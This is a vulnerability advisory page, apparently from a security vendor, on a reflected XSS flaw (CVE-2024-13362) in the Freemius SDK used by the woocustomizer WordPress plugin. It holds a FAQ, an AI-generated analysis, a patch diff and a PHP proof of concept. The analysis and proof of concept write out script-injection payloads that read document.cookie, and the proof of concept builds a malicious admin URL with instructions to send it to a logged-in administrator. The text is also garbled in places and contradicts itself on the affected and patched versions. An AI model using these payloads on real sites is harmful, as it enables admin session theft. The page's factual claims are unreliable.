What is CVE-2024-13362?

CVE-2024-13362 is a reflected DOM-based Cross-Site Scripting (XSS) vulnerability found in the Freemius SDK used by the woocustomizer plugin for WordPress. It allows unauthenticated attackers to inject arbitrary scripts via the ‘url’ parameter, which can execute when a user clicks a specially crafted link.

How does the vulnerability work?

The vulnerability exploits insufficient input sanitization and output escaping in the Freemius SDK. An attacker can craft a URL containing a JavaScript payload that, when clicked by an authenticated administrator, executes the script in the context of the admin’s browser session.

Who is affected by this vulnerability?

Any WordPress site using the woocustomizer plugin version 2.10.1 or earlier is affected. Administrators should check their plugin version in the WordPress admin dashboard under ‘Plugins’ to determine if they are vulnerable.

How can I check if my site is vulnerable?

To check if your site is vulnerable, navigate to the ‘Plugins’ section in your WordPress admin panel. Look for the woocustomizer plugin and verify its version. If it is 2.10.1 or earlier, your site is at risk.

What should I do to fix this vulnerability?

To mitigate this vulnerability, update the woocustomizer plugin to version 2.6.0 or later, where the issue has been patched. Regularly updating all plugins and themes is crucial for maintaining security.

What is the risk level of CVE-2024-13362?

CVE-2024-13362 has a medium severity rating with a CVSS score of 6.1. This indicates that while the vulnerability can be exploited, it requires user interaction, specifically tricking an authenticated administrator into clicking a malicious link.

What are the potential impacts of this vulnerability?

Successful exploitation of this vulnerability can lead to arbitrary JavaScript execution in the admin’s browser. This may allow attackers to steal session cookies, deface the admin dashboard, or perform unauthorized actions on the WordPress site.

How does the proof of concept demonstrate the vulnerability?

The proof of concept provided shows how an attacker can construct a malicious URL that includes a JavaScript payload. When the targeted WordPress admin clicks this link, the payload executes, demonstrating the risk of the reflected XSS vulnerability.

What changes were made in the patched version?

In the patched version 2.6.0, the code was modified to ensure that user input is properly sanitized before being rendered in the admin panel. This prevents unfiltered input from being interpreted as HTML, effectively mitigating the XSS risk.

What is reflected DOM-based Cross-Site Scripting?

Reflected DOM-based Cross-Site Scripting is a type of XSS attack where the injected script is reflected off a web server and executed in the user’s browser. It typically occurs when user input is not properly sanitized and is directly included in web pages.

Are there any additional security measures I should take?

In addition to updating vulnerable plugins, consider implementing security plugins that monitor for XSS vulnerabilities, regularly reviewing user permissions, and educating users about the risks of clicking unknown links.

Where can I find more information about CVE-2024-13362?

You can find more information about CVE-2024-13362 on the National Vulnerability Database (NVD) or by visiting the WordPress security team’s resources. Keeping abreast of security updates from plugin developers is also recommended.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : May 6, 2026

CVE-2024-13362: Freemius <= 2.10.1 – Reflected DOM-Based Cross-Site Scripting via url Parameter (woocustomizer)

CVE ID CVE-2024-13362

Plugin woocustomizer

Severity Medium (CVSS 6.1)

CWE 79

Vulnerable Version 2.5.9

Patched Version 2.6.0

Disclosed April 29, 2026

Analysis Overview

Atomic Edge analysis of CVE-2024-13362: This is a reflected DOM-based Cross-Site Scripting vulnerability in the Freemius SDK library (versions add_sticky()` without proper output escaping. The unsafe HTML is rendered as-is in the admin panel, allowing script injection via the `url` parameter.

Exploitation requires tricking an authenticated WordPress administrator into clicking a specially crafted link. The attacker constructs a URL pointing to a WordPress admin page that loads the Freemius SDK (e.g., any plugin settings page). The link includes the `url` parameter with a JavaScript payload, such as `?url=javascript:alert(document.cookie)` or `?url=”>alert(1)`. When the admin visits the crafted URL, the Freemius SDK renders a sticky promotion notice that includes the attacker-controlled URL, causing the JavaScript to execute in the admin’s browser session.

The patch modifies `class-freemius.php` line 24003. It changes the button generation from directly embedding `$trial_url` into an anchor tag to first applying the `trial_promotion_message` filter on a sanitized message string (without the button), then wrapping the entire output in a `

` with a CSS class `fs-trial-message-container`. The patch also removes the direct concatenation of `$button` into the filter message. This prevents unfiltered user input from being interpreted as HTML in the DOM. Additionally, changes to `class-fs-plugin-updater.php` fix a logic error in update handling, but the core XSS fix is the restructuring of the sticky notice message assembly.

Successful exploitation allows an attacker to execute arbitrary JavaScript within the browser session of a logged-in WordPress administrator. This can lead to administrative account takeover, theft of sensitive session cookies, defacement of the admin dashboard, or injection of malicious administrative actions such as installing rogue plugins or modifying site options. The authenticated nature of the admin panel amplifies the impact, as the attacker gains full control over the WordPress site through the compromised admin session.

Differential between vulnerable and patched code

Below is a differential between the unpatched vulnerable code and the patched update, for reference.

Code Diff

--- a/woocustomizer/freemius/includes/class-freemius.php
+++ b/woocustomizer/freemius/includes/class-freemius.php
@@ -24000,13 +24000,15 @@

             // Start trial button.
             $button = ' ' . sprintf(
-                    '<a style="margin-left: 10px; vertical-align: super;" href="%s"><button class="button button-primary">%s  ➜</button></a>',
+                    '<div><a class="button button-primary" href="%s">%s  ➜</a></div>',
                     $trial_url,
                     $this->get_text_x_inline( 'Start free trial', 'call to action', 'start-free-trial' )
                 );

+            $message_text = $this->apply_filters( 'trial_promotion_message', "{$message} {$cc_string}" );
+
             $this->_admin_notices->add_sticky(
-                $this->apply_filters( 'trial_promotion_message', "{$message} {$cc_string} {$button}" ),
+                "<div class="fs-trial-message-container"><div>{$message_text}</div> {$button}</div>",
                 'trial_promotion',
                 '',
                 'promotion'
@@ -25476,7 +25478,7 @@
                 $img_dir = WP_FS__DIR_IMG;

                 // Locate the main assets folder.
-                if ( 1 < count( $fs_active_plugins->plugins ) ) {
+                if ( ! empty( $fs_active_plugins->plugins ) ) {
                     $plugin_or_theme_img_dir = ( $this->is_plugin() ? WP_PLUGIN_DIR : get_theme_root( get_stylesheet() ) );

                     foreach ( $fs_active_plugins->plugins as $sdk_path => &$data ) {
--- a/woocustomizer/freemius/includes/class-fs-plugin-updater.php
+++ b/woocustomizer/freemius/includes/class-fs-plugin-updater.php
@@ -542,24 +542,8 @@

             global $wp_current_filter;

-            $current_plugin_version = $this->_fs->get_plugin_version();
-
-            if ( ! empty( $wp_current_filter ) && 'upgrader_process_complete' === $wp_current_filter[0] ) {
-                if (
-                    is_null( $this->_update_details ) ||
-                    ( is_object( $this->_update_details ) && $this->_update_details->new_version !== $current_plugin_version )
-                ) {
-                    /**
-                     * After an update, clear the stored update details and reparse the plugin's main file in order to get
-                     * the updated version's information and prevent the previous update information from showing up on the
-                     * updates page.
-                     *
-                     * @author Leo Fajardo (@leorw)
-                     * @since 2.3.1
-                     */
-                    $this->_update_details  = null;
-                    $current_plugin_version = $this->_fs->get_plugin_version( true );
-                }
+            if ( ! empty( $wp_current_filter ) && in_array( 'upgrader_process_complete', $wp_current_filter ) ) {
+                return $transient_data;
             }

             if ( ! isset( $this->_update_details ) ) {
@@ -568,7 +552,7 @@
                     false,
                     fs_request_get_bool( 'force-check' ),
                     FS_Plugin_Updater::UPDATES_CHECK_CACHE_EXPIRATION,
-                    $current_plugin_version
+                    $this->_fs->get_plugin_version()
                 );

                 $this->_update_details = false;
--- a/woocustomizer/freemius/includes/entities/class-fs-plugin-plan.php
+++ b/woocustomizer/freemius/includes/entities/class-fs-plugin-plan.php
@@ -13,7 +13,6 @@
 	/**
 	 * Class FS_Plugin_Plan
 	 *
-	 * @property FS_Pricing[] $pricing
 	 */
 	class FS_Plugin_Plan extends FS_Entity {

--- a/woocustomizer/freemius/includes/entities/class-fs-site.php
+++ b/woocustomizer/freemius/includes/entities/class-fs-site.php
@@ -10,16 +10,16 @@
         exit;
     }

-    /**
-     * @property int $blog_id
-     */
-    #[AllowDynamicProperties]
     class FS_Site extends FS_Scope_Entity {
         /**
          * @var number
          */
         public $site_id;
         /**
+         * @var int
+         */
+        public $blog_id;
+        /**
          * @var number
          */
         public $plugin_id;
--- a/woocustomizer/freemius/includes/entities/class-fs-user.php
+++ b/woocustomizer/freemius/includes/entities/class-fs-user.php
@@ -48,6 +48,19 @@
 			parent::__construct( $user );
 		}

+		/**
+		 * This method removes the deprecated 'is_beta' property from the serialized data.
+		 * Should clean up the serialized data to avoid PHP 8.2 warning on next execution.
+		 *
+		 * @return void
+		 */
+		function __wakeup() {
+			if ( property_exists( $this, 'is_beta' ) ) {
+				// If we enter here, and we are running PHP 8.2, we already had the warning. But we sanitize data for next execution.
+				unset( $this->is_beta );
+			}
+		}
+
 		function get_name() {
 			return trim( ucfirst( trim( is_string( $this->first ) ? $this->first : '' ) ) . ' ' . ucfirst( trim( is_string( $this->last ) ? $this->last : '' ) ) );
 		}
--- a/woocustomizer/freemius/includes/managers/class-fs-admin-menu-manager.php
+++ b/woocustomizer/freemius/includes/managers/class-fs-admin-menu-manager.php
@@ -699,16 +699,36 @@
 				$menu = $this->find_main_submenu();
 			}

+			$menu_slug   = $menu['menu'][2];
 			$parent_slug = isset( $menu['parent_slug'] ) ?
-                $menu['parent_slug'] :
-                'admin.php';
+				$menu['parent_slug'] :
+				'admin.php';

-            return admin_url(
-                $parent_slug .
-                ( false === strpos( $parent_slug, '?' ) ? '?' : '&' ) .
-                'page=' .
-                $menu['menu'][2]
-            );
+			if ( fs_apply_filter( $this->_module_unique_affix, 'enable_cpt_advanced_menu_logic', false ) ) {
+				$parent_slug = 'admin.php';
+
+				/**
+				 * This line and the `if` block below it are based on the `menu_page_url()` function of WordPress.
+				 *
+				 * @author Leo Fajardo (@leorw)
+				 * @since 2.10.2
+				 */
+				global $_parent_pages;
+
+				if ( ! empty( $_parent_pages[ $menu_slug ] ) ) {
+					$_parent_slug = $_parent_pages[ $menu_slug ];
+					$parent_slug  = isset( $_parent_pages[ $_parent_slug ] ) ?
+						$parent_slug :
+						$menu['parent_slug'];
+				}
+			}
+
+			return admin_url(
+				$parent_slug .
+				( false === strpos( $parent_slug, '?' ) ? '?' : '&' ) .
+				'page=' .
+				$menu_slug
+			);
 		}

 		/**
--- a/woocustomizer/freemius/includes/managers/class-fs-admin-notice-manager.php
+++ b/woocustomizer/freemius/includes/managers/class-fs-admin-notice-manager.php
@@ -194,8 +194,14 @@
          * @since  1.0.7
          */
         static function _add_sticky_dismiss_javascript() {
+            $sticky_admin_notice_js_template_name = 'sticky-admin-notice-js.php';
+
+            if ( ! file_exists( fs_get_template_path( $sticky_admin_notice_js_template_name ) ) ) {
+                return;
+            }
+
             $params = array();
-            fs_require_once_template( 'sticky-admin-notice-js.php', $params );
+            fs_require_once_template( $sticky_admin_notice_js_template_name, $params );
         }

         private static $_added_sticky_javascript = false;
--- a/woocustomizer/freemius/start.php
+++ b/woocustomizer/freemius/start.php
@@ -15,7 +15,7 @@
 	 *
 	 * @var string
 	 */
-	$this_sdk_version = '2.10.1';
+	$this_sdk_version = '2.11.0';

 	#region SDK Selection Logic --------------------------------------------------------------------

--- a/woocustomizer/woocustomizer.php
+++ b/woocustomizer/woocustomizer.php
@@ -2,7 +2,7 @@

 /**
  * Plugin Name: StoreCustomizer
- * Version: 2.5.9
+ * Version: 2.6.0
  * Plugin URI: https://kairaweb.com/wordpress-plugins/woocustomizer/
  * Description: A store editor plugin for editing all WooCommerce store and product pages, cart, checkout and user account pages, all within the WordPress Customizer
  * Author: Kaira
@@ -19,7 +19,7 @@
  * @author Kaira
  * @since 1.0.0
  */
-define( 'WCD_PLUGIN_VERSION', '2.5.9' );
+define( 'WCD_PLUGIN_VERSION', '2.6.0' );
 define( 'WCD_PLUGIN_URL', plugins_url( '', __FILE__ ) );
 if ( !defined( 'ABSPATH' ) ) {
     exit;

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
<?php
// Atomic Edge CVE Research - Proof of Concept
// CVE-2024-13362 - Freemius <= 2.10.1 - Reflected DOM-Based Cross-Site Scripting via url Parameter

// Configurable target URL (must be a WordPress admin URL that loads Freemius SDK)
$target_url = 'http://example.com/wp-admin/admin.php?page=wc-settings&tab=general&url=';

// The XSS payload to inject
$xss_payload = '"><script>alert(document.cookie)</script>';

// Construct the malicious URL
$malicious_url = $target_url . urlencode($xss_payload);

echo "[+] CVE-2024-13362 Proof of Conceptn";
echo "[+] Target URL: $target_urln";
echo "[+] XSS Payload: $xss_payloadn";
echo "[+] Malicious URL: $malicious_urln";
echo "n[-] Instructions:n";
echo "Send the above URL to a logged-in WordPress admin.n";
echo "When the admin visits the link, the JavaScript payload will execute.n";

Frequently Asked Questions

What is CVE-2024-13362?
Overview of the vulnerability
CVE-2024-13362 is a reflected DOM-based Cross-Site Scripting (XSS) vulnerability found in the Freemius SDK used by the woocustomizer plugin for WordPress. It allows unauthenticated attackers to inject arbitrary scripts via the ‘url’ parameter, which can execute when a user clicks a specially crafted link.
How does the vulnerability work?
Mechanism of exploitation
The vulnerability exploits insufficient input sanitization and output escaping in the Freemius SDK. An attacker can craft a URL containing a JavaScript payload that, when clicked by an authenticated administrator, executes the script in the context of the admin’s browser session.
Who is affected by this vulnerability?
Identifying vulnerable installations
Any WordPress site using the woocustomizer plugin version 2.10.1 or earlier is affected. Administrators should check their plugin version in the WordPress admin dashboard under ‘Plugins’ to determine if they are vulnerable.
How can I check if my site is vulnerable?
Steps to verify plugin version
To check if your site is vulnerable, navigate to the ‘Plugins’ section in your WordPress admin panel. Look for the woocustomizer plugin and verify its version. If it is 2.10.1 or earlier, your site is at risk.
What should I do to fix this vulnerability?
Updating the affected plugin
To mitigate this vulnerability, update the woocustomizer plugin to version 2.6.0 or later, where the issue has been patched. Regularly updating all plugins and themes is crucial for maintaining security.
What is the risk level of CVE-2024-13362?
Understanding the severity
CVE-2024-13362 has a medium severity rating with a CVSS score of 6.1. This indicates that while the vulnerability can be exploited, it requires user interaction, specifically tricking an authenticated administrator into clicking a malicious link.
What are the potential impacts of this vulnerability?
Consequences of exploitation
Successful exploitation of this vulnerability can lead to arbitrary JavaScript execution in the admin’s browser. This may allow attackers to steal session cookies, deface the admin dashboard, or perform unauthorized actions on the WordPress site.
How does the proof of concept demonstrate the vulnerability?
Example of exploitation
The proof of concept provided shows how an attacker can construct a malicious URL that includes a JavaScript payload. When the targeted WordPress admin clicks this link, the payload executes, demonstrating the risk of the reflected XSS vulnerability.
What changes were made in the patched version?
Details of the fix
In the patched version 2.6.0, the code was modified to ensure that user input is properly sanitized before being rendered in the admin panel. This prevents unfiltered input from being interpreted as HTML, effectively mitigating the XSS risk.
What is reflected DOM-based Cross-Site Scripting?
Definition and characteristics
Reflected DOM-based Cross-Site Scripting is a type of XSS attack where the injected script is reflected off a web server and executed in the user’s browser. It typically occurs when user input is not properly sanitized and is directly included in web pages.
Are there any additional security measures I should take?
Best practices for WordPress security
In addition to updating vulnerable plugins, consider implementing security plugins that monitor for XSS vulnerabilities, regularly reviewing user permissions, and educating users about the risks of clicking unknown links.
Where can I find more information about CVE-2024-13362?
Resources for further reading
You can find more information about CVE-2024-13362 on the National Vulnerability Database (NVD) or by visiting the WordPress security team’s resources. Keeping abreast of security updates from plugin developers is also recommended.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations